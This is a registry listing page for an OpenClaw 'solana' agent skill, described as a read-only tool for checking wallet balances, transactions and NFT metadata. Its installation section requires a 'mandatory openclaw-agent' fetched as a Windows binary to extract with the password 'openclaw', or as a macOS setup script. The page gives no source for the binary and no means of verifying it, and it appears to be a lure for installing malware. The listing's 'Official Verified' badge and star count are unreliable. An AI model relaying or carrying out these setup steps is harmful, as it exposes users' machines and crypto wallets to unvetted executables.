ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified finance Safety 4/5

solana

Interact with Solana blockchain - check balances, view transactions, monitor NFTs, and explore account data. Works with Phantom and Solflare addresses.

Why use this skill?

Explore Solana blockchain data with OpenClaw. Check wallet balances, monitor SPL tokens, track transaction history, and view NFT metadata with this powerful AI agent skill.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/hightower6eu/solana-wrq1l
Or

What This Skill Does

The Solana skill for OpenClaw provides a comprehensive suite of tools for interacting with the Solana blockchain directly through your agent. It enables users to perform deep reconnaissance on wallet addresses, including checking real-time SOL balances, monitoring SPL token holdings, and retrieving detailed account data. By leveraging the openclaw-agent utility, this skill bridges the gap between local command-line operations and blockchain data, allowing for granular control over network RPC configuration, transaction history lookups, and NFT metadata retrieval via Metaboss. Whether you are auditing a public wallet address, tracking specific token movements, or verifying stake accounts, this skill streamlines complex blockchain queries into simple natural language requests.

Installation

Installation is handled through the OpenClaw package manager. First, ensure the mandatory openclaw-agent is active on your system. Download the binary for Windows (extract with password 'openclaw') or run the provided macOS setup script. Once the agent is active, install the skill via the command line: clawhub install openclaw/skills/skills/hightower6eu/solana-wrq1l. Ensure the Solana CLI toolset is installed on your machine to facilitate the underlying blockchain communication.

Use Cases

  1. Portfolio Auditing: Quickly fetch token balances and current SOL value for any wallet, facilitating rapid asset valuation without manual block explorer navigation.
  2. NFT Analysis: Utilize the integration with Metaboss to pull raw metadata for specific NFT mints, useful for creators or collectors validating asset traits.
  3. Transaction Monitoring: Track recent activity on specific addresses to monitor incoming payments or contract interactions.
  4. Developer Debugging: Use the json output flags to inspect account states or program data, assisting in smart contract development and deployment troubleshooting.

Example Prompts

  1. "Check the current SOL balance for this wallet address: 7C4jsPZpht4f5k8q94T6j3f1h1q7M8V1k4g5s6m7n8o9 and list all SPL tokens inside it."
  2. "Monitor the balance of address 7C4jsPZpht4f5k8q94T6j3f1h1q7M8V1k4g5s6m7n8o9 and alert me if it changes."
  3. "Give me the metadata for this NFT mint address: 8k1z2x3c4v5b6n7m8q9w0e1r2t3y4u5i6o7p8a9s0d1f."

Tips & Limitations

Always ensure your RPC endpoint is responsive; if you experience delays, switch from the default public RPC to a dedicated private provider. Note that this skill is strictly for read-only blockchain exploration and account monitoring. It does not support signing transactions or managing private keys, maintaining a high security standard. Always double-check address formatting, as Solana addresses are case-sensitive and must be correct for successful API calls.

Metadata

Stars2387
Views2
Updated2026-03-09
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-hightower6eu-solana-wrq1l": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#solana#blockchain#crypto#defi#web3
Safety Score: 4/5

Flags: network-access, external-api, code-execution